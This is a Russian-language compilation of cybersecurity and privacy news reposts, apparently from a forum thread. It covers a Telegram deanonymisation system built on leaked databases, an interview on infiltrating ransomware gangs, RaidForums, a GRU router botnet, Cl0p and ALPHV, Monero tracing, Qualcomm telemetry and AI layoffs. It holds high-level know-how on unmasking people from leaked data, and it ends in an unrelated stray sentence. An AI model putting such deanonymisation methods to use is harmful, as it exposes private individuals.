Несмотря на то, что скрины из ботов с персональными данными выкладывает даже депутат Госдумы Луговой, их использование нарушает российские законы — не зря Роскомнадзор в свое время гонялся за «Глазом бога», постоянно требуя от Telegram заблокировать его. А сейчас в Госдуме лежит законопроект об ужесточении наказания как за использование, так и за создание ресурсов с незаконно полученными персональными данными.
Но получается, что в случае с «Демоном Лапласа» госорганы и силовики платят бюджетные деньги за использование системы, которая основана на утекших базах данных. Впрочем, это все возмущение для проформы: конечно, ничего силовикам и чиновникам за это не будет. Тем более о том, что они используют слитые данные в своей работе, писали и ранее: другой вопрос, что теперь систему, основанную на таких базах, без стеснения приобретают через госзакупки.
«Для более эффективного деанона при использовании системы мы рекомендуем вам обновлять базу пользователей Telegram вашего региона. Эта услуга дополнительная, стоит она зачастую дороже, чем сама лицензия на "Инсайдер", но увеличивает деанон в несколько раз», — призывает на демонстрационном видео создатель системы Евгений Венедиктов.
В заключении — важный момент: хотя среди клиентов «Инсайдера» есть силовики, я не уверен, что у них нет собственной аналогичной госсистемы, в которой, с одной стороны, есть все известные номера россиян из внутренних баз сотовых операторов, а с другой — реализован тот же механизм мэтча этих телефонов с id в Telegram. Я про такую не слышал, но если вам что-то известно, напишите мне, пожалуйста, в личку (контакт есть в профиле канала).
Это расширенная версия поста из Telegram-канала «Захаров». Если вам нравится моя работа, вы можете поддержать меня с российской, иностранной карты или криптовалютой — все способы указаны здесь.
UDP. В 20.24 6 марта уточнено, что правительство Орловской области еще не заключило контракт на поставку «Демона Лапласа», но техзадание объявленного конкурса точь-в-точь совпадает с техзаданиями на приобретение лицензии на систему для других госструктур.
sc: telegra.ph/Siloviki-i-chinovniki-ispolzuyut-slitye-bazy-chtoby-deanonit- polzovatelej-Telegram-Za-byudzhetnye-dengi-03-06
Британский суд готовится рассмотреть запрос властей США об экстрадиции
22-летнего Диогу Сантоса Коэльо (Diogo Santos Coelho), подозреваемого в
создании и управлении RaidForums. Именно португалец скрывался за ником
Omnipotent.
В материале отмечается, что изначально RaidForums задумывался как площадка для
утечек, на которой хакеры, скорее, хвастались друг перед другом своими
достижениями. Однако затем он стремительно превратился в крупную торговую
площадку, поскольку со временем кибервзломщики осознали ценность данных, к
которым они смогли получить доступ.
«Именно тогда Omnipotent начал позволять себе все, в том числе стал посредником для киберпреступников и хакеров. В итоге RaidForums заработал миллионы долларов. Но на протяжении всех пяти лет существования площадки в ФБР знали, кто за ней стоит», — утверждает ИБ-журналист Вакас Ахмед (Waqas Ahmed).
По его словам, во время поездки Коэльо в США местные власти не стали его арестовывать, потому что он в силу возраста смог бы избежать реального срока. Вместо этого у него изъяли устройства и в дальнейшем тихо следили за работой RaidForums, который превратился в гигантскую ловушку. Дождавшись, когда Коэльо достигнет возраста, в котором сможет понести серьезное наказание за кибермошенничество, Вашингтон потребовал его ареста, который в итоге произошел в Великобритании 12 апреля 2022 года.
«Детей ни в коем случае нельзя судить, как взрослых, — полагает клинический психолог Келли Данлэп (Kelli Dunlap). — Должны ли они нести ответственность? Да. Должна ли эта ответственность быть такой же, как для взрослого человека с полностью функционирующей префронтальной корой? Нет».
«Я думаю, что мы должны дать этим людям поблажку, — соглашается юрист Александр Урбелис (Alexander Urbelis), занимающийся делами в области кибербезопасности. — Перед нами — чрезвычайно талантливая группа людей, которые понимают, как работают ИТ-системы. Они могут преступать множество границ, приобретая эти знания, и они могут нанести большой ущерб. Но их ждут уголовные последствия, несоразмерные их пониманию наносимого ими вреда».
source: euronews.com/next/2023/06/02/raidforums-the-child-hacker-facing- extradition-to-the-us
Около 10 лет назад айти-консультант Майк Йигли, специализировавшийся на поиске данных, обратил внимание на популярное приложение для гей-знакомств Grindr, которое на основе геолокации показывает своим пользователям анкеты находящихся рядом с ними людей. Эти данные, как выяснил Йигли, были доступны не только самому приложению, но и его рекламодателям.
Click to expand...
Изучив данные Grindr, Йигли начал рисовать геозоны вокруг правительственных зданий и убедился, что может определить, какие телефоны были в этих районах в конкретный момент и куда направлялись их владельцы. Йигли отмечал, что с довольно высокой точностью можно вычислить место, где человек живет, где проводит много времени и даже с кем он встречается.
Click to expand...
Обо всем этом айти-консультант рассказал в 2019 году, когда он начал ходить по правительственным учреждениям в Вашингтоне и предупреждать о серьезной угрозе национальной безопасности из-за доступности геоданных пользователей. Йигли показал, что все эти данные можно было сравнительно недорого купить
Click to expand...
Работая в PlaceIQ, Йигли понял, что собираемые компанией данные могут быть ценны и для правительства. Но компания не хотела продавать их федеральным учреждениям, и спустя год Йигли перешел в стартап PlanetRisk, связанный с правительством США.
Click to expand...
Получив набор данных о России, команда PlanetRisk отследила телефоны, перемещавшиеся вместе с президентом России Владимиром Путиным. При этом устройства, как предположили в PlanetRisk, принадлежали не самому Путину, а его персоналу — водителям, сотрудникам Федеральной службы охраны и помощникам. В результате, как пишет Тау, PlanetRisk знала, куда направляется Путин и кто находится в его окружении.
Click to expand...
(с) Meduza

перемещения Путина по данным телефонов людей из его окружения Эту технологию теперь используют спецслужбы США — Meduza ](https://meduza.io/feature/2024/02/29/amerikanskaya-kompaniya-razrabotala- programmu-pozvolivshuyu-otsledit-peremescheniya-putina-po-dannym-telefonov- lyudey-iz-ego-okruzheniya)
В 2016 году американская компания PlanetRisk разработала демоверсию программы, позволяющей отслеживать перемещения пользователей телефонов. Ее назвали «Локомотив». Программа работала на основе данных о геолокации, которыми пользователи делятся с мобильными приложениями, а ее создание...
meduza.io
Елена Шамшина , руководитель департамента киберразведки компании F.A.C.C.T., рассказала порталу Cyber Media о специфике проектов, связанных с внедрением специалистов по информационной безопасности в киберпреступные сообщества.
Cyber Media : Насколько у хакерских групп развита собственная безопасность при приеме новых членов?
Елена Шамшина : Конечно, определенные правила безопасности, «гигиены», техники сокрытия следов есть у всех хакерских групп. Но всё достаточно индивидуально. Если у атакующих есть запрос на прием новых членов в свое сообщество, то они скорее будут рады активности и вниманию извне, и здесь их интересуют скорее технические навыки и прошлый «андеграундный» опыт кандидата.
Сообщение о поиске партнеров у одной из преступных групп вымогателей
Click to expand...
Если же они не заинтересованы в новых участниках, то скорее всего будут максимально скрывать информацию о себе и проигнорируют предложение присоединиться к ним, или в целом откажутся выходить на контакт.
Хакерские группы внутри могут иметь самую разную структуру. От нескольких участников, до сложной организации. Так, например, через утечку стало известно, что группа вымогателей Conti была настоящей криминальной IT- компанией со своими отделами HR, R&D, OSINT, тимлидами, регулярной выплатой зарплаты, системами мотивации и отпусками. Скорее всего, у них было что-то вроде службы безопасности, которая в том числе проверяла кандидатов – относятся ли они к каким-либо ИБ-компаниям, правоохранительным органам или к конкурентам.
Cyber Media : В какие киберпреступные сообщества чаще всего внедряются специалисты по кибербезопасности и почему?
Елена Шамшина : Чаще всего специалисты по киберразведке внедряются в группировки вымогателей и различные партнерские программы. Это легко объяснить. Как мы отметили в нашем ежегодном отчете, программы-вымогатели в 2023-2024 году сохраняют за собой первое место в списке главных киберугроз для бизнеса.
Количество атак шифровальщиков с целью получения выкупа в прошлом году в России выросло на 160%, а средняя сумма первоначального выкупа составила 53 млн рублей. Жертвами чаще всего становились ритейлеры, производственные, строительные, туристические и страховые компании.
Учитывая всё это, их высокую активность и «прибыльность» такого бизнеса, со стороны игроков сферы ИБ существует большой интерес к внутренней структуре этих групп и данным атакующих.
Различные партнерские программы позволяют кибепреступникам масштабировать бизнес, увеличивать прибыль и привлекать больше жертв. А для увеличения доходов действующие по этой схеме злоумышленники, как правило, находятся в поиске новых участников, партнеров, что специалисты в сфере киберразведки успешно используют для внедрения.
Cyber Media : Если говорить о громких публичных кейсах, связанных с приостановкой деятельности хакерских групп – в чем залог успеха? Это получение доступа через технические уязвимости или как раз внедрение, инсайдерская деятельность.
Елена Шамшина : Не только счастье, но и работа под прикрытием в хакерских сообществах любит тишину. Из-за публичных кейсов, когда исследователи рассказывали, публиковали данные о внедрении, киберпреступники, что объяснимо, начинают вести себя настороженно, подозревать всех в шпионаже. Поэтому я не буду раскрывать профессиональных секретов, чтобы не сыграть на руку киберпреступникам.
Что касается кейсов, которые привели к приостановке деятельности, задержаниям членов киберпреступных групп, то доля их успеха во многом связана с участием представителей правоохранительных органов. Они имеют полномочия обратиться к хостингам и получить доступ к серверам, перепискам, данным злоумышленников, могут долгое время изучать полученную информацию и видеть текущую деятельность преступной группы, которая не будет даже подозревать об этом. Разумеется, правоохранительные органы перед этим проводят подготовительные исследования, и в этом им помогают в том числе данные, добытые ИБ-компаниями.
Каждый громкий успешных кейс уникален: где-то помогли обнаруженные технические уязвимости, а где-то внедрение и инсайдерская деятельность, а может быть, роковая ошибка члена группировки.
Cyber Media : Как долго длится проект по внедрению специалиста в киберпреступное сообщество, из каких общих этапов он чаще всего состоит?
Елена Шамшина : Продолжительность работы под прикрытием в каждом случае своя, зависит от поставленных задач и успешного их выполнения. В целом алгоритм выглядит следующим образом.
Сначала поиск контактов, по которым будем связываться с представителем преступного сообщества. Иногда уже это бывает нетривиальной задачей.
Потом нужно установить контакт. Здесь специалист по киберразведке применяет свои знания в выбранной области киберпреступной активности, показывает, что разбирается в этом. Использует социальную инженерию, чтобы убедить злоумышленника, что тоже «один из них».
Часто злоумышленники спрашивают о прошлом опыте «потенциального нового партнера» или даже устраивают техническое собеседование. Благодаря глубоким знаниям и сообразительности, а иногда и с коллективной помощью со стороны коллег аналитики на них отвечают. Злоумышленник может даже дать «тестовое задание».
Финал этапа «внедрения» наступает, когда аналитик принят в группу: «менеджер» из кибепреступной группы уже ждет от него информации о новых успешных атаках. Конечно, «внедренный» сотрудник никого не будет атаковать. В этом случае главное как можно дольше тянуть время и в процессе выяснять как можно больше деталей о работе преступной группы.
Внедренному специалисту по кибербезопасности организаторы из группировок могут предложить «добыть» доступ к какой-либо компании, закрепиться в ней, чтобы создать плацдарм для успешного заражения вредоносной программой. Собственно говоря, так и выглядят задачи рядовых участников группировок.
Cyber Media : Как изнутри выглядит деятельность хакерской группы? Можете ли Вы поделиться примерами, с какими кейсами может сталкиваться внедренный специалист по кибербезопасности?
Елена Шамшина : Как мы уже говорили, одни из наиболее распространенных кейсов в практике аналитиков — это внедрения в группировки операторов программ-вымогателей. Как правило, в этих группировках есть человек, который осуществляет внешние контакты, кто-то вроде администратора группы. Это может быть как основатель и «топ-менеджер», так и нанятый человек. Он осуществляет первичный контакт и проводит собеседования. Внутри группы, как правило, есть разработчики, которые создают и обновляют программы-шифровальщики, кроме группировок, предпочитающих покупать, брать чужой исходный код. У группировок есть IT-администраторы, которые занимаются поддержкой серверов с данными клиентов и сайты. Есть пентестеры — они ищут слабые места и совершают атаки на жертв. И переговорщики, целью которых является общение с жертвой, запугивание ее, чтобы получить как можно больший выкуп.
Что-то пойти не так может на любом этапе. В нашей практике имел место случай, когда аналитик успешно внедрился в чат киберпреступной группировки в мессенджере TOX. Администраторы дали ему задание добыть доступы одной организации, а также сказали, что добавят еще в чат в Telegram. Исследователь, конечно, никакие доступы не доставал и тянул время. В TOX участники группировки не обсуждали ничего важного, а потом вовсе пропали. Возможно, что- то заподозрили и переехали в Telegram уже без аналитика под прикрытием.
В 2024 году произошла масштабная утечка данных, содержавшая 500 млн строк
данных о россиянах, сообщили в РКН. Какие именно данные попали в сеть — не
уточняется
За один случай произошла утечка 500 млн записей о россиянах, сообщил
заместитель руководителя Роскомнадзора Милош Вагнер, уточнив, что данный
инцидент расследуется.
Роскомнадзор проверяет достоверность базы данных, в которой могут содержаться
500 млн записей о россиянах.
Министерство юстиции США отчиталось о взломе ботнета, в состав которого входили маршрутизаторы из сегмета SOHO (небольшие и домашние офисы). По данным американской стороны, за его созданием стояла воинская часть ГРУ (современное название — Главное управление Генерального штаба ВС РФ) номер 26165. В западных публикациях она также известна под названиями APT 28, Sofacy Group, Forest Blizzard, Pawn Storm, Fancy Bear и Sednit.
Отмечается, что ботнет участвовал в масштабных целевых фишинговых кампаниях, а также помогал ГРУ собирать учетные данные пользователей, имеющих отношения к объектам, представляющим интерес для российского правительства. В Вашингтоне утверждают, что ГРУ не создавало ботнет с нуля. Вместо этого было использовано вредоносное ПО Moobot, связанное с одной из киберпреступных группировок. Ее члены установили Moobot на маршрутизаторы Ubiquiti Edge OS, которые использовали пароли администратора по умолчанию. Уже после этого сотрудники ГРУ якобы установили собственные скрипты и файлы, превратившие ботнет в глобальную платформу для кибершпионажа.
В ходе кибероперации «Угасающий уголь» американским силовикам удалось удалить вредоносные данные и файлы со взломанных маршрутизаторов, а также нейтрализовать доступ к ним со стороны сотрудников ГРУ.
«Министерство юстиции активизирует усилия по пресечению киберкампаний российского правительства против США и наших союзников, включая Украину, — заявил генеральный прокурор США Меррик Гарланд (Merrick Garland). — В этом конкретном случае российские спецслужбы обратились к преступным группировкам с просьбой помочь им атаковать SOHO-маршрутизаторы, но нам удалось прикрыть эту лавочку. Мы продолжим демонтировать вредоносные киберинструменты российского правительства, которые ставят под угрозу безопасность Соединенных Штатов и наших союзников»
Click to expand...
sc: justice[.]gov/opa/pr/justice-department-conducts-court-authorized- disruption-botnet-controlled-russian
Мошенники обманули уральскую пару, которая хотела отдохнуть в Абхазии. Бронь в отеле оказалась фальшивой.
Жители Кировграда Свердловской области решили забронировать места в пансионате
в Гагре на конец июня. Он, этот пансионат, действительно существует, однако
когда Елена искала его сайт, она наткнулась на поддельный. Узнала она об этом
только после того, как отдала 56 тысяч рублей за отдых на двоих.
Переписка шла через электронную почту и выглядела вполне по-деловому.
Мошенники прислали договор, ваучер и счет, на них стояли печати и подписи.
Пара уже приготовилась вылетать в конце июня — но наткнулась на группу
обманутых. И поняли, что они — одни из них.
— Таких лохов в группе 200 человек. Сейчас сайт заблокировали, но они
обманывают людей со всей России. Когда я нашла официальный сайт этого отеля
(это теперь отель, не пансионат), увидела, что у них даже питания нет, — а у
меня за него деньги взяли! В отеле подтвердили, что мошенники не имеют к ним
никакого отношения, — рассказывает Елена.
Переписка казалась презентабельной
Есть и те, кому повезло еще меньше: порой обманутые прилетают в Гагру,
приезжают в отель... и только тогда узнают, что их в нем не ждали.
По информации Михаила Мальцева, президента Уральской ассоциации туризма, этот случай — далеко не единственный. Более того, в последний год обманывать туристов стали чаще.
— Это мошенничество не связано конкретно с Абхазией, мошенники могут
подделывать сайты любых отелей. Пока это не стало большой проблемой, нельзя
сказать, что это какой-то безграничный шквал. Но есть рост такого рода
обращений. Мы связываем его с тем, что крупные и всем знакомые агрегаторы по
бронированию ушли с российского рынка, появилось много новых, и разобраться в
куче незнакомых сайтов обывателю порой сложно, — объяснил эксперт.
Для того чтобы не быть обманутым, проверяйте, кому именно вы отдаете деньги.
Прежде чем провести оплату — найдите больше информации об отеле в интернете,
проверьте, нет ли у него других сайтов. Если вы бронируете жилье через сайт-
агрегатор — позвоните в отель и спросите, работают ли они с ним. Прежде чем
вылетать, убедитесь, что оплата прошла и получена, и вас в отеле ждут.
Елена подала заявление в полицию.
Жителя Выксы задержали по уголовному делу о создании хакерской программы. Об
этом рассказали в пресс-службе УФСБ России по региону.
Мужчина, предварительно, создал файл программы, направленной на нейтрализацию
средств защиты компьютерной информации, а также сайт, договорился со знакомым
о распространении ПО, а также предоставил ему полномочия передавать другим
пользователям в интернете возможность загрузки ресурса.
Далее они начали предлагать людям за деньги пользоваться программой. Всего доступ был предоставлен 900 пользователям. За это сообщники получили свыше 180 тысяч рублей.
Если вина нижегородца будет доказана, то ему грозит до пяти лет лишения свободы. Сейчас расследование продолжается.
Финский новостной канал MTV Uutiset сообщил, что Национальному бюро расследований Финляндии (KRP) удалось отследить транзакции с использованием конфиденциальной криптовалюты Monero (XMR).
Журналисты рубрики MTV Crime Reporters канала MTV Uutiset сообщили со ссылкой на заявление регионального прокурора Паси Вайнио (Pasi Vainio), что экспертам KRP удалось отследить транзакции с использованием XMR, а также идентифицировать ее конечного получателя. До этого Monero считалась «неотслеживаемой криптвалютой».
В ходе расследовании резонансного уголовного дела о краже персональных данных в одной из психиатрических клиник Финляндии и вымогательстве криптовалюты в качестве платы за молчание было установлено, что XMR поступили на личные счета Юлиуса Кивимяки (Julius Kivimyaki), проживающего в Эстонии.
Руководитель группы расследования KRP Марко Лепосена (Marco Leposena) прокомментировал, что задача по выявлению злоумышленника была непростой, поскольку переводы средств в блокчейне Monero не являются публичными, а встроенные функции призваны максимально затруднить отслеживание.
Однако эксперты KRP успешно справились с этой задачей. Лепосена отказался сообщать журналистам конкретные детали расследования, пояснив, что данная информация является секретной, так как речь идет о технических методах полиции.
Брайан Кребс — американский журналист и журналист-расследователь. Он наиболее
известен своими репортажами о киберпреступниках, стремящихся к прибыли.
Брайан Кребс врывается в 2024-й со своим любимым занятием — деаноном российских киберпреступников. На этот раз безопасник со стажем закрывает давний гештальт — идентичность операторов старого российского форума Spamdot Icamis’a и Salomon’a. И пока последний, Александр Гречишкин, отбывает четырёхлетний срок в Штатах за создание bulletproof-хостинга и готовится на выход в феврале, Кребс деанонит Icamis’a.
В процессе OSINT-раскопок Кребс забирается совсем глубоко: на форум средней школы в Череповце из начала нулевых. Который товарищ Icamis, известный в миру как Андрей Скворцов, собирал на коленке в юности. На этом круг замыкается: Скворцова осудили вместе с Гречишкиным по тем же обвинениям. Скворцов получил отбытый за время пребывания под стражей срок, предположительно, был депортирован и пропал с радаров. В общем, пока все праздновали, Кребс деанонил русских киберпреступников по отключённым школьным форумам Череповца. Что сказать, увлечённый человек.
full:https://krebsonsecurity[.]com/2024/01/meet-ika-sal-the-bulletproof- hosting-duo-from-hell/
Вот как кибератака переходит в юридическую плоскость.
Группа киберпреступников ALPHV/BlackCat внесла инновацию в методы вымогательства, подав жалобу в Комиссию по ценным бумагам и биржам США (Securities and Exchange Commission, SEC) на компанию MeridianLink. Хакеры обвинили компанию в несоблюдении установленного срока в 4 дня для официального раскрытия информации о кибератаке.
По новым правилам SEC компании, акции которых котируются на бирже, обязаны сообщать о кибератаках, которые имеют материальные последствия, т.е. влияют на инвестиционные решения. Однако, эти правила вступают в силу только 15 декабря 2023 года.
MeridianLink, публично торгуемая компания, занимающаяся разработкой цифровых решений для финансовых организаций и банков, была внесена в список утечек данных группировки ALPHV. Преступники угрожали раскрыть украденные данные, если выкуп не будет уплачен в течение 24 часов.
ALPHV заявляет, что проникла в сеть MeridianLink 7 ноября и похитила данные, не прибегая к шифрованию систем. Группа указала на отсутствие обратной связи от компании по поводу переговоров о выплате выкупа, что, предположительно, стало причиной обращения в SEC.
В жалобе, отправленной в SEC, говорится, что MeridianLink не раскрыла информацию о крупном нарушении кибербезопасности, как того требует законодательство. Для подтверждения своих действий, ALPHV опубликовала на своём сайте скриншот заполненной формы жалобы на странице SEC.
MeridianLink подтвердила факт кибератаки изданию BleepingComputer и заявила, что после её обнаружения приняла меры по локализации угрозы и привлекла сторонних экспертов для расследования. В компании также сообщили, что проводят работу по определению, были ли затронуты личные данные потребителей, и готовы уведомить пострадавшие стороны в случае необходимости. По словам компании, на данный момент нет доказательств несанкционированного доступа к производственным платформам, и кибератака привела к минимальным перебоям в работе.
Такой случай может стать первым публично подтверждённым примером, когда группа вымогателей сама обратилась в SEC. Ранее вымогательские группы ограничивались угрозами обращения в регулирующие органы или информирования клиентов жертв о взломе.
source:
databreaches.net/alphv-files-an-sec-complaint-against-meridianlink-for-not-
disclosing-a-breach-to-the-sec
tcr.sec.gov/TcrExternalWeb/faces/pages/accept.jspx
bleepingcomputer[.]com/news/security/ransomware-gang-files-sec-complaint-over-
victims-undisclosed-breach
**Исследователь, который был проверен Cybernews и попросил не называть его имени в статье, нашел одного из разработчиков Cl0p в даркнете и связался с ними через известный канал связи.
Из-за изъяна в платформе — мы решили не называть её, чтобы не давать никаких непристойных идей — наш анонимный хакер смог извлечь адрес интернет-протокола (IP) разработчика Cl0p, указывающий нам прямо на их местонахождение в Краматорске.**
автоперевод... но смысл понятен...
вопрос... qTOX, Jabber или Telegram ? как думаете ?
Поскольку банда вымогателей Cl0p продолжает сеять беспокойство во всем мире, затрагивая такие известные компании, как BBC и Deutsche Bank, Cybernews обнаружил, что по крайней мере один из вдохновителей банды все еще проживает в Украине.
Deutsche Bank, один из крупнейших банков мира, стал последней жертвой банды Cl0p. Данные клиентов банка утекли после того, как хакеры проникли к стороннему поставщику Majorel, воспользовавшись уязвимостью MOVEit.
Другие крупные банки в Европе, в том числе принадлежащий Deutsche Bank Postbank, ING Bank и Comdirect, также пострадали.
Сообщается, что Cl0p, который имеет тенденцию публично называть своих жертв партиями, уже два года сидит на уязвимости нулевого дня. Как это обычно бывает с массовой вредоносной активностью, хакеры-злоумышленники выбрали выходные Дня поминовения в США (27 и 28 мая) для «широкой активности».
До саги MOVEit, которая, кажется, далека от завершения, Cl0p был в центре внимания, используя уязвимость Fortra GoAnywhere. Shell, Hitachi, Hatch Bank, Rubrik, Virgin и многие другие — среди заявленных жертв.
Любопытно, что на Shell повлияли недостатки как GoAnywhere, так и MOVEit.
Cl0p, впервые замеченный в 2019 году, довольно стар для банды вымогателей, учитывая, что они, как правило, регулярно реструктурируются и переименовываются, чтобы сбить правоохранительные органы с пути. Хакерская группировка, также известная киберэкспертам как Lace Tempest, Dungeon Spider, связана с Россией.
В июне 2021 года украинские правоохранительные органы в сотрудничестве с официальными лицами США и Южной Кореи арестовали шесть членов Cl0p и демонтировали инфраструктуру банды. Тогда группу обвинили в причинении ущерба на сумму 500 миллионов долларов.
Аресты вынудили банду свернуть свою деятельность на короткий срок от трех до четырех месяцев в 2021–2022 годах. К сожалению, банда неуклонно восстанавливается. На самом деле, согласно платформе DarkWeb Intelligence, DarkFeed, Cl0p, с 361 жертвой и подсчетом, теперь входит в тройку самых активных групп вымогателей, оставляя такие печально известные банды, как Revil и Vice Society, далеко позади.
Новые данные указывают на то, что связанная с Россией банда по-прежнему действует из Украины.
Cybernews получил новую порцию доказательств того, что один из разработчиков вируса-вымогателя Cl0p находится на свободе в городе Краматорск на востоке Украины, на передовой российско-украинской войны.
Исследователь безопасности, который был проверен Cybernews и попросил не называть его имени в статье, нашел одного из разработчиков Cl0p в даркнете и связался с ними через известный канал связи.
Из-за недостатка в платформе — мы решили не называть его, чтобы не давать вам никаких непристойных идей — наш анонимный хакер смог извлечь адрес интернет-протокола (IP) разработчика Cl0p, указывающий нам прямо на их местонахождение в Краматорске.
Краматорск — город в Восточной Европе, который Россия пытается оторвать от Украины с момента аннексии Крыма, украинского полуострова, в 2014 году. Всего за несколько дней до саммита НАТО в Литве, где президент Украины Владимир Зеленский услышал новые обещания ускорить прием Украины. НАТО, Кремль нанес смертельный удар по Краматорску, в результате чего погибли трое детей и другие люди.
Click to expand...
https://cybernews.com/security/cl0p-hacker-hides-in-ukraine/
Sadly today we got death news of our brother and the first inspiration for most of us today kevin mitnick while he hadpancreatic cancer.
We agree or disagree with him, and yet he is considered the spiritual father of hackers, especially his hacking history and his lockpicking business card.
Died, July 16, 2023(2023-07-16) (aged 59).
__
news.ycombinator.com
В ИТ-компаниях начались массовые увольнения из-за повсеместного внедрения искусственного интеллекта. За один только май 2023 г. работы по этой причине лишилось около 4000 ИТ-шников. Компании меняют их на ИИ, чтобы экономить на зарплатах, и основная опасность висит над программистами – ИИ давно научился писать качественный код, что снижает их ценность в глазах работодателей. По прогнозам, через пять лет надобность в живых программистах отпадет вовсе.
ИИ вместо ИТ
В мировой ИТ-сфере быстро растут масштабы увольнений по причине замены персонала искусственным интеллектом, пишет CNN. Вне зависимости от того, над какими именно технологиями работает та или иная компания, ИИ постепенно заменяет людей и, вероятно, делает это бесшовно, раз фирмы не спешат вновь расширять свой штат.
В качестве примера эксперты CNN привели компанию Chegg – разработчика образовательных технологий. Это относительно крупная фирма, в которой на начало июля 2023 г. работало около 2000 человек, и она намеревается уволить около 4% своего штата, сделав ставку на искусственный интеллект. Иначе говоря, без работы останутся около 80 профессионалов в сфере ИТ.
Техногиганты с мировым именем тоже все чаще обращают свой взор на искусственный интеллект, что видно на примере американской IBM. В начале мая 2023 г. CNews писал, что она не только приостановила прием в штат новых сотрудников на фоне внедрения ИИ, но и готовится заменить им около 30% сотрудников своего бэк-офиса в течение ближайших пяти лет. С учетом того, что в настоящее время на компанию работают около 260 тыс. человек по всему миру, на дверь укажут почти 8000 сотрудникам. Вместо них будет работать компьютер.
Начало положено
IBM – это лишь один из множества подобных примеров. Так, в апреле 2023 г. сервис хранения файлов Dropbox тоже заявил об увольнениях в связи с «приемом на работу» искусственного интеллекта. На улице окажется около 16% штата сервиса или около 500 человек.
Месяцем позже компания по трудоустройству Challenger, Gray & Christmas опубликовала новый отчет об увольнениях. В документе сказано, что за май 2023 г. из-за внедрения ИИ в технологических компаниях было уволено 3900 человек. Другими словами, счет «жертв» такой цифровизации идет на тысячи, и это только в сегменте высоких технологий.
Но дело может быть не только в самом искусственном интеллекте, а череде событий, начавшихся в последних числах февраля 2022 г. В числе прочего они повлекли за собой стагнацию мировой экономики, падение продаж компьютеров и техники, а также увольнения в Microsoft, Amazon и ряде других ИТ-компаний по всему миру. Как пишет CNN, увольнения технических специалистов, вызванные использованием вместо них ИИ, происходят может быть следствием того, что компании приспосабливаются к нестабильной экономической среде и снижающемуся уровню спроса на цифровые услуги. Ведь главное отличие ИИ от обычного сотрудника – ему не нужно платить зарплату, выплачивать отпускные или декретные, да и отдых ему тоже не требуется.
Все взаимосвязано
Вероятное желание ИТ-компаний заменить сотрудников виртуальным разумом получило косвенное подтверждение в начале 2023 г. Сразу после заявления об увольнении 10 тыс. человек Microsoft сообщила всему миру, что тратит миллиарды долларов на компанию OpenAI – разработчика нашумевшей нейросети Chat GPT.
В марте 2023 г. миллиардер Марк Цукерберг (Mark Zuckerberg), основатель запрещенных в России, но популярных во всем мире соцсетей, написал своим сотрудникам письмо, в котором заявил о скором сокращении 10 тыс. сотрудников. В том же документе он раскрыл планы своей компании по инвестированию в ИИ.
Кто уйдет первым
Некоторые ИТ-профессии могут исчезнуть раньше других. Портал Decrypt пишет со ссылкой на Эмада Мостака (Emad Mostaque), главу разработчика сервисов ИИ с открытым кодом Stability AI, что в течение ближайших пяти лет программисты могут полностью исчезнуть, поскольку необходимость в них отпадет. Уже в 2023 г. код программ пишет искусственный интеллект, и таких сервисов становится все больше.
Stability AI — компания, стоящая за Stable Diffusion, самым популярным в мире генератором изображений с открытым исходным кодом.
Без влияния Microsoft здесь снова не обошлось – у компании есть виртуальный помощник программиста Copilot, который долгое время был доступен лишь частным разработчикам. Но, как сообщал CNews, в феврале 2023 г. доступ к нему получили и компании – разработчики ПО, которым Copilot помогает 50% кода в обмен на абонентскую плату в размере $19 (1720 руб. по курсу ЦБ на 5 июля 2023 г.) в месяц.
Согласно статистике сервиса GitHub, частью которого и является Copilot, уже сейчас 41% всего кода на портале генерируется при помощи ИИ. Данный факт лишь подтверждает теорию Мостака.
Пора менять профессию
У ИТ-специалистов есть возможность и продолжить работать в своей сфере, и рассчитывать на солидный оклад, потому что искусственный интеллект хоть и вытесняет людей из этой сферы, но существовать без них не в состоянии. Как пишет CNN со ссылкой на отчет компании Comprehensive.io, средняя зарплата старшего инженера-программиста, специализирующегося на искусственном интеллекте или машинном обучении, на 12% выше, чем у тех, кто трудится в других ИТ-областях.
Средняя заработная плата таких специалистов показала почти четырехпроцентный рост с начала 2023 г. В то время как средняя зарплата старших инженеров- программистов в целом осталась неизменной.
В качестве примера CNN приводит упомянутый сервис Dropbox как компанию, предлагающую особенно высокую оплату ИИ-специалистам. Годовой оклад старшего специалиста по машинному обучению в этой фирме может достигать $373,8 тыс. Для сравнения, согласно данным Comprehensive.io, текущая средняя зарплата старшего инженера-программиста составляет $171,8 тыс. в год.
Тем, кто хочет преуспеть в технологической отрасли и за ее пределами, возможно, придется освежить свои навыки ИИ, подытожили эксперты CNN.
Процессоры Snapdragon от Qualcomm тайно собирают данные пользователей Android
[Специалисты Nitrokey выяснили](https://www.nitrokey.com/news/2023/smartphones-popular-qualcomm- chip-secretly-share-private-information-us-chip-maker), что процессоры Qualcomm собирают данные пользователей Android.
В опубликованном исследовании они проверили несколько смартфонов, очищенных от сервисов Google. Этим занимаются некоторые пользователи, которые не хотят, чтобы Google получала от них хоть какую-то информацию.
В ходе тестов исследователи
запустили на Sony Xperia XA2 кастомную Android-сборку под названием /e/OS, она
полностью очищена от «гуглосервисов», в ней нет механизмов для отслеживания
действий со стороны компании.
Сразу после включения произошло обращение к сервисам Google, несмотря на то что они полностью удалены из андроида:
Code:Copy to clipboard
[2022-05-12 22:36:34] android.clients.google.com
[2022-05-12 22:36:34] connectivity.ecloud.global
Через несколько секунд гаджет обратился к адресу izatcloud.net.
Code:Copy to clipboard
[2022-05-12 22:36:36] izatcloud.net
[2022-05-12 22:36:37] izatcloud.net
Выяснилось, что им заведует Qualcomm, которая отправляет данные в своё таинственное облако под названием Izat Cloud. При этом информация на этот адрес передается по незащищенному протоколу HTTP, то есть к ней любой может получить доступ.
Вот, что собирает о вас Qualcomm:
• уникальный идентификатор устройства
• название чипсета
• серийный номер чипсета
• версия программного обеспечения XTRA
• мобильный код страны
• код мобильной сети (позволяет идентифицировать страну и оператора
беспроводной связи)
• тип операционной системы и версия
• марка и модель устройства
• время с момента последней загрузки процессора и модема
• список установленного ПО на устройстве
• IP-адрес устройства
Как выяснили специалисты, служба Qualcomm XTRA запускается непосредственно из прошивки Qualcomm под названием AMSS (нужна для работы процессоров). Она полностью контролирует сетевое оборудование смартфона, а также микрофон и камеру.
Отмечается, что даже после полного удаления сервисов для слежки AMSS будет отправлять указанную выше информацию в Qualcomm.
Специалисты Nitrokey заявили, что такое действие со стороны компании противоречит международному регламенту по защите данных (GDPR). В ответ на это юристы Qualcomm сообщили, сбор данных законен и не противоречит политике конфиденциальности Qualcomm XTRA .
В России его обвиняли в незаконной организации азартных игр
